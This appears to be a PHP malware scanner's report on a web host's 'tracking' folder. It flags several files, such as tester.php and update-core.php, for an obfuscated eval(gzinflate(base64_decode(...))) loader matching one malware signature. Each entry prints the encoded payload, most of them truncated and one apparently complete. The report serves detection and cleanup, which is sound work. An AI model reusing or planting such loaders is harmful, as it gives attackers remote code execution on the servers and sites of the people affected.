<?php 'H4sIAAAAAAAEAKVUXW/TMBR9r5T/cIkqLZVoInhC9EvQVqgvbGydBEIocpObxsWxM9vpKNP+O7aTrllbEIi8JDn33HM/fK+9ThQtONWU0J+Ur0HnCAqVooJ7neYjVppIHfQGXscz9BlmlO+5nBQIIoOSrNHrdO0LRuCXQrCYV8UKpd+4LXjCqtT6cUyMMJE7yChD5XUk3lVUYix4gnBBHRGjSlMWlnl5MfgdQ99TRkWcI0lR7qneU0XsUNLsPYjVBhNtckxXJkOO9wZ0Na2ZWBEG3ev59PJ6tvj44aZRubFl7xVyXTBYVVmG0kKCg0okIodMigJylKYN/J7I1NQzGXud4YvZ5XT55WruPC3gFBjh65GP3DcImGdok2++3X+BmhgXXfZtyduR/7l/+64/FUVJNF0x9CERXCPXI38xH83TtUGiPwpMa35/uSvb3hp/6MjmNIAkJ1KhHlU66785ktNUMxwPJ6a7gEkuoOuQAUzGw6g2tti...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVUXW/TMBR9r5T/cIkqLZVoInhC9EvQVqgvbGydBEIocpObxsWxM9vpKNP+O7aTrllbEIi8JDn33HM/fK+9ThQtONWU0J+Ur0HnCAqVooJ7neYjVppIHfQGXscz9BlmlO+5nBQIIoOSrNHrdO0LRuCXQrCYV8UKpd+4LXjCqtT6cUyMMJE7yChD5XUk3lVUYix4gnBBHRGjSlMWlnl5MfgdQ99TRkWcI0lR7qneU0XsUNLsPYjVBhNtckxXJkOO9wZ0Na2ZWBEG3ev59PJ6tvj44aZRubFl7xVyXTBYVVmG0kKCg0okIodMigJylKYN/J7I1NQzGXud4YvZ5XT55WruPC3gFBjh65GP3DcImGdok2++3X+BmhgXXfZtyduR/7l/+64/FUVJNF0x9CERXCPXI38xH83TtUGiPwpMa35/uSvb3hp/6MjmNIAkJ1KhHlU...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVUXW/TMBR9r5T/cIkqLZVoInhC9EvQVqgvbGydBEIocpObxsWxM9vpKNP+O7aTrllbEIi8JDn33HM/fK+9ThQtONWU0J+Ur0HnCAqVooJ7neYjVppIHfQGXscz9BlmlO+5nBQIIoOSrNHrdO0LRuCXQrCYV8UKpd+4LXjCqtT6cUyMMJE7yChD5XUk3lVUYix4gnBBHRGjSlMWlnl5MfgdQ99TRkWcI0lR7qneU0XsUNLsPYjVBhNtckxXJkOO9wZ0Na2ZWBEG3ev59PJ6tvj44aZRubFl7xVyXTBYVVmG0kKCg0okIodMigJylKYN/J7I1NQzGXud4YvZ5XT55WruPC3gFBjh65GP3DcImGdok2++3X+BmhgXXfZtyduR/7l/+64/FUVJNF0x9CERXCPXI38xH83TtUGiPwpMa35/uSvb3hp/6MjmNIAkJ1KhHlU...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ajax_handle.php

Size: 7.63 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09/XPbOK4/pzP9H1RdJrJ3Hedjb29f0zqt67ht9hI7Gzvd9y7NqIrFJNrKlivJbXN3/d8fwA+JlEhbTpM2d7O+nYsrgiAIAiAAgvLDBwlJkiCauEnqxWmt/uThg5h8mAUxcaPJiNScYDIKZz7ZmKVB2JxeTR0ECS4nEUDMEhK73nnEO8Lzi9qjIElIWlt1B93BYL/fO3UoVOA7Z3Vrbc16vuoe9QfDU+diNhk5Z62WbdcfPvjXwwcWfK6I55O45rweDo82tpqb1l83f7JeRvF54PtkQodGMPI5SOHrFxxyY8Pa2x+0Xxx0rU6787r78AFHYne80RVZ70STNI7CHWsSrY/wScMaz5J0PSYfvTDwvZTY9ScWYOFjbuUIup+nwIdkxxp4acPa/pv16yy0th4//sXa/HlncxP+s14dDnn3PcBkBRMrvSLW1EtSTttLmGUK/LWG3nlIHj5YpaO6F/xxYrUsL4696xqbmXM...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09/XPbOK4/pzP9H1RdJrJ3Hedjb29f0zqt67ht9hI7Gzvd9y7NqIrFJNrKlivJbXN3/d8fwA+JlEhbTpM2d7O+nYsrgiAIAiAAgvLDBwlJkiCauEnqxWmt/uThg5h8mAUxcaPJiNScYDIKZz7ZmKVB2JxeTR0ECS4nEUDMEhK73nnEO8Lzi9qjIElIWlt1B93BYL/fO3UoVOA7Z3Vrbc16vuoe9QfDU+diNhk5Z62WbdcfPvjXwwcWfK6I55O45rweDo82tpqb1l83f7JeRvF54PtkQodGMPI5SOHrFxxyY8Pa2x+0Xxx0rU6787r78AFHYne80RVZ70STNI7CHWsSrY/wScMaz5J0PSYfvTDwvZTY9ScWYOFjbuUIup+nwIdkxxp4acPa/pv16yy0th4//sXa/HlncxP+s14dDnn3PcBkBRMrvSLW1EtSTttLmGU...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09/XPbOK4/pzP9H1RdJrJ3Hedjb29f0zqt67ht9hI7Gzvd9y7NqIrFJNrKlivJbXN3/d8fwA+JlEhbTpM2d7O+nYsrgiAIAiAAgvLDBwlJkiCauEnqxWmt/uThg5h8mAUxcaPJiNScYDIKZz7ZmKVB2JxeTR0ECS4nEUDMEhK73nnEO8Lzi9qjIElIWlt1B93BYL/fO3UoVOA7Z3Vrbc16vuoe9QfDU+diNhk5Z62WbdcfPvjXwwcWfK6I55O45rweDo82tpqb1l83f7JeRvF54PtkQodGMPI5SOHrFxxyY8Pa2x+0Xxx0rU6787r78AFHYne80RVZ70STNI7CHWsSrY/wScMaz5J0PSYfvTDwvZTY9ScWYOFjbuUIup+nwIdkxxp4acPa/pv16yy0th4//sXa/HlncxP+s14dDnn3PcBkBRMrvSLW1EtSTttLmGU...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/tester.php

Size: 363.00 B Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAF2PQWuDQBCFzxX8D4MUViEYem5Jegmlh6YHvQQJspFRB+Ks7KyGEvLfs6Z6yTCnN9/MmxcGVMckgi5+Lb92eaEERciwOibJNQzA16yU4rR1cfL+r2LVGog+eoubaJZ6S+xK6y9luyz7/t0/sesFvuFZEJ6dO03n2fblsTEJsRqJ+e/zgqc3QZNWplMrVeQojrg5wo9nBO2IFirDNTWD1W76fxXlLQn41uA8ncLBDFBpBmrYWAQ3jTufTTeYRsny1hy6b3vi2jzi3sJguwmDO756fd0sAQAA'

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAF2PQWuDQBCFzxX8D4MUViEYem5Jegmlh6YHvQQJspFRB+Ks7KyGEvLfs6Z6yTCnN9/MmxcGVMckgi5+Lb92eaEERciwOibJNQzA16yU4rR1cfL+r2LVGog+eoubaJZ6S+xK6y9luyz7/t0/sesFvuFZEJ6dO03n2fblsTEJsRqJ+e/zgqc3QZNWplMrVeQojrg5wo9nBO2IFirDNTWD1W76fxXlLQn41uA8ncLBDFBpBmrYWAQ3jTufTTeYRsny1hy6b3vi2jzi3sJguwmDO756fd0sAQAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAF2PQWuDQBCFzxX8D4MUViEYem5Jegmlh6YHvQQJspFRB+Ks7KyGEvLfs6Z6yTCnN9/MmxcGVMckgi5+Lb92eaEERciwOibJNQzA16yU4rR1cfL+r2LVGog+eoubaJZ6S+xK6y9luyz7/t0/sesFvuFZEJ6dO03n2fblsTEJsRqJ+e/zgqc3QZNWplMrVeQojrg5wo9nBO2IFirDNTWD1W76fxXlLQn41uA8ncLBDFBpBmrYWAQ3jTufTTeYRsny1hy6b3vi2jzi3sJguwmDO756fd0sAQAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/billing_log.php

Size: 5.31 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK07/XPbNrI/yzP+HxCcXySdRUnOtO/ubEmuYyuNb9LWz1Z6L+Pn4VAkZDGhSJWA/HE9/+9vFwBJECRtJa2bTExgsdjvXSzQ3Z3B4HTJ/C9kkaTET+JFeNvv7+6Ei86rRRgxlz2EXPAODWM/2gRsoEHWyzXtdnd3ft/dIfAThKxDR/PJbMlSRkJOvJiwNE3SPjmVCwgiI3EiYJ9NHPTJRcQ8zkjKnDDmwosiovYXni8I36zXSSr6o8F8QrtHuztPuzuccR4msQvAqejgYMp+24Qpc5PYZ512RuBGhBGS124GufBuw9gTgC0H3AvmZExidk/O3krkUgQ/7EV+NHrT1VwumRewtEM/JL5cfUjCOGAPShhHCgbkJRTBuyDaC+AvSryASBlzJdeQcyY6e+7V9Orq/Jefr9sbzlI3DNo3hkSre0UJUN2wV7ggJsI1S1ehFFf7hozIQZdorMeT3Z0R99NwLYh4XLMxFexBDD5...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK07/XPbNrI/yzP+HxCcXySdRUnOtO/ubEmuYyuNb9LWz1Z6L+Pn4VAkZDGhSJWA/HE9/+9vFwBJECRtJa2bTExgsdjvXSzQ3Z3B4HTJ/C9kkaTET+JFeNvv7+6Ei86rRRgxlz2EXPAODWM/2gRsoEHWyzXtdnd3ft/dIfAThKxDR/PJbMlSRkJOvJiwNE3SPjmVCwgiI3EiYJ9NHPTJRcQ8zkjKnDDmwosiovYXni8I36zXSSr6o8F8QrtHuztPuzuccR4msQvAqejgYMp+24Qpc5PYZ512RuBGhBGS124GufBuw9gTgC0H3AvmZExidk/O3krkUgQ/7EV+NHrT1VwumRewtEM/JL5cfUjCOGAPShhHCgbkJRTBuyDaC+AvSryASBlzJdeQcyY6e+7V9Orq/Jefr9sbzlI3DNo3hkSre0UJUN2wV7ggJsI1S1ehFFf...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK07/XPbNrI/yzP+HxCcXySdRUnOtO/ubEmuYyuNb9LWz1Z6L+Pn4VAkZDGhSJWA/HE9/+9vFwBJECRtJa2bTExgsdjvXSzQ3Z3B4HTJ/C9kkaTET+JFeNvv7+6Ei86rRRgxlz2EXPAODWM/2gRsoEHWyzXtdnd3ft/dIfAThKxDR/PJbMlSRkJOvJiwNE3SPjmVCwgiI3EiYJ9NHPTJRcQ8zkjKnDDmwosiovYXni8I36zXSSr6o8F8QrtHuztPuzuccR4msQvAqejgYMp+24Qpc5PYZ512RuBGhBGS124GufBuw9gTgC0H3AvmZExidk/O3krkUgQ/7EV+NHrT1VwumRewtEM/JL5cfUjCOGAPShhHCgbkJRTBuyDaC+AvSryASBlzJdeQcyY6e+7V9Orq/Jefr9sbzlI3DNo3hkSre0UJUN2wV7ggJsI1S1ehFFf...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/manage_exceptions.php

Size: 3.73 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAM1ae2/bOBL/ewPkOzBM9mSjkWR3293Csd3NJt5DD33hkgJb5AKDlmibW72OpPLYIt/9hg9ZD0tOW/SA1aJdiZwZDmeG85uhu7/n+2drGnxCy5SjIE2WbOV5+3ts2TtYsojO6R0TUvQwS4IoD6lvSbJ1hvv9/b3P+3sInpDRHh4vppdryiliApEEUc5T7qEzzYCUMJSkEtbJk9BD7yNKBEWcuiwRkkQRMutLEkgk8ixLufTG/mKK+yf7ew/7e4IKwdJkDsRc9tQgp//NGafzNAlozykUzCWLlHqOIjkKF2iCEnqLzn/TPL5/uQb1jIYkjFnipkl0jzKyop6afg8aRSkJkbaKMJZgQlDZO5pfzC4uXr17e+XkgvI5C53rig3WlISU9/DrNCASNB2hKF2xxJjqxNCANaXZjhb8a0VkRnnM9Bad6/Gwj6zUl9P9vbEIOMskkvcZnWBJ76T/J7khZhRPDSGJKNjF+ZjmKCD...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAM1ae2/bOBL/ewPkOzBM9mSjkWR3293Csd3NJt5DD33hkgJb5AKDlmibW72OpPLYIt/9hg9ZD0tOW/SA1aJdiZwZDmeG85uhu7/n+2drGnxCy5SjIE2WbOV5+3ts2TtYsojO6R0TUvQwS4IoD6lvSbJ1hvv9/b3P+3sInpDRHh4vppdryiliApEEUc5T7qEzzYCUMJSkEtbJk9BD7yNKBEWcuiwRkkQRMutLEkgk8ixLufTG/mKK+yf7ew/7e4IKwdJkDsRc9tQgp//NGafzNAlozykUzCWLlHqOIjkKF2iCEnqLzn/TPL5/uQb1jIYkjFnipkl0jzKyop6afg8aRSkJkbaKMJZgQlDZO5pfzC4uXr17e+XkgvI5C53rig3WlISU9/DrNCASNB2hKF2xxJjqxNCANaXZjhb8a0VkRnnM9Bad6/Gwj6zUl9P9vbEIOMs...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAM1ae2/bOBL/ewPkOzBM9mSjkWR3293Csd3NJt5DD33hkgJb5AKDlmibW72OpPLYIt/9hg9ZD0tOW/SA1aJdiZwZDmeG85uhu7/n+2drGnxCy5SjIE2WbOV5+3ts2TtYsojO6R0TUvQwS4IoD6lvSbJ1hvv9/b3P+3sInpDRHh4vppdryiliApEEUc5T7qEzzYCUMJSkEtbJk9BD7yNKBEWcuiwRkkQRMutLEkgk8ixLufTG/mKK+yf7ew/7e4IKwdJkDsRc9tQgp//NGafzNAlozykUzCWLlHqOIjkKF2iCEnqLzn/TPL5/uQb1jIYkjFnipkl0jzKyop6afg8aRSkJkbaKMJZgQlDZO5pfzC4uXr17e+XkgvI5C53rig3WlISU9/DrNCASNB2hKF2xxJjqxNCANaXZjhb8a0VkRnnM9Bad6/Gwj6zUl9P9vbEIOMs...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/billing_log_invoice.php

Size: 6.48 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEANU8+VfjONI/w3v8D2o300lmchPSECC9NMfADt2wJMy3sz28PMdWEi+OHWyZo6f5378qST4UOxc9e4XOYalUKtWtstwb65XK0Ygad2TgesRwnYE1LJc31q1B/s3AsmmPPlk+8/Oa5Rh2YNKKBJmMJlqhsLH+x8Y6gZdp0by23293R9SjxPKJ7hDqea5XJkd8AEFkxHEZzBM4Zplc2VT3KfFoyXJ8pts2EfMz3WDEDyYT12Pl/Uq/rRX2NtZfNtZ96vuW6/QA2GN5bPTofWB5tOc6Bs3nQgIDZtlIXm42yJU+tBydAbYIcNPskwPi0Edy/JEj5yz4y6Zt2Pv1glzliOom9fLahWvw0S1iOSZ9EszYEzDALyYI3gDWXsH6bFc3CeexL/hq+T5l+c1e56TTOb/8/CUX+NTrWWbutkDevSNR/88n3S85744+Q0fM6jQRtgvLmUMEOT7vHH68OCFHh0dnJxvrIYYj3RjREsi...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANU8+VfjONI/w3v8D2o300lmchPSECC9NMfADt2wJMy3sz28PMdWEi+OHWyZo6f5378qST4UOxc9e4XOYalUKtWtstwb65XK0Ygad2TgesRwnYE1LJc31q1B/s3AsmmPPlk+8/Oa5Rh2YNKKBJmMJlqhsLH+x8Y6gZdp0by23293R9SjxPKJ7hDqea5XJkd8AEFkxHEZzBM4Zplc2VT3KfFoyXJ8pts2EfMz3WDEDyYT12Pl/Uq/rRX2NtZfNtZ96vuW6/QA2GN5bPTofWB5tOc6Bs3nQgIDZtlIXm42yJU+tBydAbYIcNPskwPi0Edy/JEj5yz4y6Zt2Pv1glzliOom9fLahWvw0S1iOSZ9EszYEzDALyYI3gDWXsH6bFc3CeexL/hq+T5l+c1e56TTOb/8/CUX+NTrWWbutkDevSNR/88n3S85744+Q0fM6jQRtgv...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANU8+VfjONI/w3v8D2o300lmchPSECC9NMfADt2wJMy3sz28PMdWEi+OHWyZo6f5378qST4UOxc9e4XOYalUKtWtstwb65XK0Ygad2TgesRwnYE1LJc31q1B/s3AsmmPPlk+8/Oa5Rh2YNKKBJmMJlqhsLH+x8Y6gZdp0by23293R9SjxPKJ7hDqea5XJkd8AEFkxHEZzBM4Zplc2VT3KfFoyXJ8pts2EfMz3WDEDyYT12Pl/Uq/rRX2NtZfNtZ96vuW6/QA2GN5bPTofWB5tOc6Bs3nQgIDZtlIXm42yJU+tBydAbYIcNPskwPi0Edy/JEj5yz4y6Zt2Pv1glzliOom9fLahWvw0S1iOSZ9EszYEzDALyYI3gDWXsH6bFc3CeexL/hq+T5l+c1e56TTOb/8/CUX+NTrWWbutkDevSNR/88n3S85744+Q0fM6jQRtgv...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/call_detail.php

Size: 6.94 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAN08aVcbx5af43P8H4o2iaQJUsskOLaE5MggxyQYGJAzkwccnZK6JJXd6tZ0l8Akj/8+91b1vmOUZaZfXoJqvVvdpapuPX2i6wcLNv1EZrZDprY14/NW6+kTPqtvzbjJxuwzd4Vb17g1NdcG070mq8VKazSePvnj6RMCn8FZXduf9EcL5jDCXUItwhzHdlrkQHYgOBixbAHzrC2jRc5MRl1GHNbkliuoaRI1v6BTQdz1amU7orWvT/pao/v0yf3TJy5zXW5bY2jsiDoWOux/1txhY9uasnrNB3AtuIng1bDJtjEhPWKxW3L4RvaZm/aEmmT7fHhwen54dPLTxQ7ZHh29H/7r9GQIfwouTIYdpwDS2GCCctOFIWCgZn/OxAEUH6rS+vb4p+HossaN2nUj6AIosmSHEyxLNn8KlD8D9E2bGkSywFVk567LBLS+GF5cHJ2eXNbWLnPGsltI8AWjBnPq2rE9pQLI0iGmPee...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN08aVcbx5af43P8H4o2iaQJUsskOLaE5MggxyQYGJAzkwccnZK6JJXd6tZ0l8Akj/8+91b1vmOUZaZfXoJqvVvdpapuPX2i6wcLNv1EZrZDprY14/NW6+kTPqtvzbjJxuwzd4Vb17g1NdcG070mq8VKazSePvnj6RMCn8FZXduf9EcL5jDCXUItwhzHdlrkQHYgOBixbAHzrC2jRc5MRl1GHNbkliuoaRI1v6BTQdz1amU7orWvT/pao/v0yf3TJy5zXW5bY2jsiDoWOux/1txhY9uasnrNB3AtuIng1bDJtjEhPWKxW3L4RvaZm/aEmmT7fHhwen54dPLTxQ7ZHh29H/7r9GQIfwouTIYdpwDS2GCCctOFIWCgZn/OxAEUH6rS+vb4p+HossaN2nUj6AIosmSHEyxLNn8KlD8D9E2bGkSywFVk567LBLS+GF5cHJ2...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN08aVcbx5af43P8H4o2iaQJUsskOLaE5MggxyQYGJAzkwccnZK6JJXd6tZ0l8Akj/8+91b1vmOUZaZfXoJqvVvdpapuPX2i6wcLNv1EZrZDprY14/NW6+kTPqtvzbjJxuwzd4Vb17g1NdcG070mq8VKazSePvnj6RMCn8FZXduf9EcL5jDCXUItwhzHdlrkQHYgOBixbAHzrC2jRc5MRl1GHNbkliuoaRI1v6BTQdz1amU7orWvT/pao/v0yf3TJy5zXW5bY2jsiDoWOux/1txhY9uasnrNB3AtuIng1bDJtjEhPWKxW3L4RvaZm/aEmmT7fHhwen54dPLTxQ7ZHh29H/7r9GQIfwouTIYdpwDS2GCCctOFIWCgZn/OxAEUH6rS+vb4p+HossaN2nUj6AIosmSHEyxLNn8KlD8D9E2bGkSywFVk567LBLS+GF5cHJ2...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/manage_pc_templates.php

Size: 2.08 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEANVXbW/bNhD+XAP+Dxcum2zAkpJi61pHUpfawpohb0BcYGkTCLRE22ypl4l0Xjb0v+8oybYcy3kB9mVJgNjH547H48OHx3bLtgczFn6DSZpDmCYTPrWsdotPOjsTLljA7rhUskN4Eop5xOwKks0y0u22W/+0W4A/EWcd4oy90YzlDLgEmgDL8zS3YFA4gA4GSapwnnkSWXAuGJUMcmbyRCoqBJTzKxoqkPMsS3NlOfbYI92Ddut7uyWZlDxNAgTnqqONOftrznMWpEnIOsYiwbniQqdnaMhuRqcMXCA0inmivxBtjcZoS9gtDD90SlgYKBZngiomcQgBpjdl6nyWJmyQRmy0GCzg7dZUpGMqYHd0dOJ/Pjv1C6Ntn+NyREojKEoqyzJyKZnq7AYX/sXF0dnpF2MuWR7wyLiuFXDGaMTyDjlOQ6pwmX0Q6ZQnZZ0PSgxuhSprgWFr8TKWx7wojnHt7HehCvnea7ccGeY...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANVXbW/bNhD+XAP+Dxcum2zAkpJi61pHUpfawpohb0BcYGkTCLRE22ypl4l0Xjb0v+8oybYcy3kB9mVJgNjH547H48OHx3bLtgczFn6DSZpDmCYTPrWsdotPOjsTLljA7rhUskN4Eop5xOwKks0y0u22W/+0W4A/EWcd4oy90YzlDLgEmgDL8zS3YFA4gA4GSapwnnkSWXAuGJUMcmbyRCoqBJTzKxoqkPMsS3NlOfbYI92Ddut7uyWZlDxNAgTnqqONOftrznMWpEnIOsYiwbniQqdnaMhuRqcMXCA0inmivxBtjcZoS9gtDD90SlgYKBZngiomcQgBpjdl6nyWJmyQRmy0GCzg7dZUpGMqYHd0dOJ/Pjv1C6Ntn+NyREojKEoqyzJyKZnq7AYX/sXF0dnpF2MuWR7wyLiuFXDGaMTyDjlOQ6pwmX0Q6ZQnZZ0PSgx...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANVXbW/bNhD+XAP+Dxcum2zAkpJi61pHUpfawpohb0BcYGkTCLRE22ypl4l0Xjb0v+8oybYcy3kB9mVJgNjH547H48OHx3bLtgczFn6DSZpDmCYTPrWsdotPOjsTLljA7rhUskN4Eop5xOwKks0y0u22W/+0W4A/EWcd4oy90YzlDLgEmgDL8zS3YFA4gA4GSapwnnkSWXAuGJUMcmbyRCoqBJTzKxoqkPMsS3NlOfbYI92Ddut7uyWZlDxNAgTnqqONOftrznMWpEnIOsYiwbniQqdnaMhuRqcMXCA0inmivxBtjcZoS9gtDD90SlgYKBZngiomcQgBpjdl6nyWJmyQRmy0GCzg7dZUpGMqYHd0dOJ/Pjv1C6Ntn+NyREojKEoqyzJyKZnq7AYX/sXF0dnpF2MuWR7wyLiuFXDGaMTyDjlOQ6pwmX0Q6ZQnZZ0PSgx...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/call_detail_outgoing.php

Size: 6.58 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAN08aXMbN7Kf11X6D9BYCckX8ZBiORYp0qFFOlaiq0Qq+7KSigVyQBL2cMCdAXU4q/++DWDum5JyvDe7ScQB0Gj0hW6gezZe1euHczL5gqbMQhNmTumsVtt4RaflzSk1yIjcU5vbZY2aE2Olk7rTZTlfapXKxqvfN14heHRKytrBuDOcE4sgaiNsImJZzKqhQzkACWDIZBzmWZl6DZ0bBNsEWaRKTZtjw0Bqfo4nHNmr5ZJZvHZQH3e0Smvj1ePGK5vYNmXmCDpbvCxeWuTfK2qRETMnpFxyEVxxagj0SqLLlj5GbWSSO9T7IMfMDDbGBtq66B+eXfSOTn8abKOt4dFJ/19np334k1NuEDFwAiiNdMIxNWwAAYCqnRnhZys+Y9ScHUJzT7WWt0Y/9YdXJaqXbireUFgqCQ4UA07Fu2j3DeDAOZDBYFhHkhW2Ij+1bcKh96A/GBydnV6VVjaxRnKYT/g5wTqxytoxm2A...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN08aXMbN7Kf11X6D9BYCckX8ZBiORYp0qFFOlaiq0Qq+7KSigVyQBL2cMCdAXU4q/++DWDum5JyvDe7ScQB0Gj0hW6gezZe1euHczL5gqbMQhNmTumsVtt4RaflzSk1yIjcU5vbZY2aE2Olk7rTZTlfapXKxqvfN14heHRKytrBuDOcE4sgaiNsImJZzKqhQzkACWDIZBzmWZl6DZ0bBNsEWaRKTZtjw0Bqfo4nHNmr5ZJZvHZQH3e0Smvj1ePGK5vYNmXmCDpbvCxeWuTfK2qRETMnpFxyEVxxagj0SqLLlj5GbWSSO9T7IMfMDDbGBtq66B+eXfSOTn8abKOt4dFJ/19np334k1NuEDFwAiiNdMIxNWwAAYCqnRnhZys+Y9ScHUJzT7WWt0Y/9YdXJaqXbireUFgqCQ4UA07Fu2j3DeDAOZDBYFhHkhW2Ij+1bcK...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN08aXMbN7Kf11X6D9BYCckX8ZBiORYp0qFFOlaiq0Qq+7KSigVyQBL2cMCdAXU4q/++DWDum5JyvDe7ScQB0Gj0hW6gezZe1euHczL5gqbMQhNmTumsVtt4RaflzSk1yIjcU5vbZY2aE2Olk7rTZTlfapXKxqvfN14heHRKytrBuDOcE4sgaiNsImJZzKqhQzkACWDIZBzmWZl6DZ0bBNsEWaRKTZtjw0Bqfo4nHNmr5ZJZvHZQH3e0Smvj1ePGK5vYNmXmCDpbvCxeWuTfK2qRETMnpFxyEVxxagj0SqLLlj5GbWSSO9T7IMfMDDbGBtq66B+eXfSOTn8abKOt4dFJ/19np334k1NuEDFwAiiNdMIxNWwAAYCqnRnhZys+Y9ScHUJzT7WWt0Y/9YdXJaqXbireUFgqCQ4UA07Fu2j3DeDAOZDBYFhHkhW2Ij+1bcK...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/update-core.php

Size: 3.65 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
